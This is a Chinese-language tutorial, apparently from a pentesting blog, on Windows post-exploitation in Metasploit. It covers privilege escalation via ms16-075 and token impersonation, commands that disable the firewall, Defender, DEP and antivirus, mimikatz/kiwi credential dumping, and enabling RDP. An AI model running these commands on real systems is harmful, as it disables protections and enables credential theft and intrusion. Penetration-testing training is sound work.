一、信息收集

当我们的msf普通权限成功连接后，如图：

 shell进入命令行模式：

 存在中文乱码，chcp 65001将编码格式改为utf-8：

 将systeminfo信息输出到文档info.txt：

 exit退出当前终端。

下载systeminfo信息 download c:\\users\\root\\Desktop\\info1.txt  /mnt/hgfs/share/info1.txt：

 将syteminfo信息通过工具筛选可能存在的提权漏洞。

如疑似存在漏洞ms16-075。将当前会话放置 后台background，查看后台会话：

 search ms16-075,搜索漏洞利用模块：

 use 1,使用模块，info查看漏洞信息

 options查看配置。最后run执行，发现执行出错，网上找一些好的payload上传

Getuid 查看当前权限

Getsystem 自动化提升

先进入会话 sessions -i n

 上传本地恶意文件到目标机器 ,尽量不要直接上传到C盘根目录会报错。

 list_tokens -u //列出当前存在的令牌

execute -cH -f C:/users/root/rottenpotato.exe 创建新进程

impersonate_token “NT AUTHORITY\\SYSTEM” //模仿windows system令牌，有时候一次不会成功，多试几次

最终提权失败。

使用模块：use multi/recon/local_exploit_suggester 来识别当前系统中可用的exp


 

 检测出几个可能利用的漏洞逐一尝试。

提权成功后即为system权限。

到system权限后总思路为远程，首先使用猕猴桃将密码读出，然后打开3389端口

首先关杀软：

关闭防火墙：
netsh advfirewall set allprofiles state off
关闭Denfender：
net stop windefend
关闭DEP：
bcdedit.exe/set{current}nx alwaysoff
关闭杀毒软件：
run killav
run post/windows/manage/killava

运行load mimikatz，版本msf6中，mimikatz被kiwi模块合并了。
查看kiwi的使用指南：help kiwi
三步走：列举所有凭据：creds_all
列举所有kerberos凭据：creds_kerberos
调用kiwi_cmd执行mimikatz命令：kiwi_cmd sekurlsa::logonpasswords   Kiwi的使用，发现执行命令没有结果或报错。
ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process。这是因为你上传的是X86的吗，需要迁移进程到x64的

使用命令：getuid查看当前进程号

然后ps查看所有进程，找到适合迁移的进程，且为system权限。

使用命令：migrate 7240迁移进程到其他id

最后的打开3389端口：run post/windows/manage/enable_rdp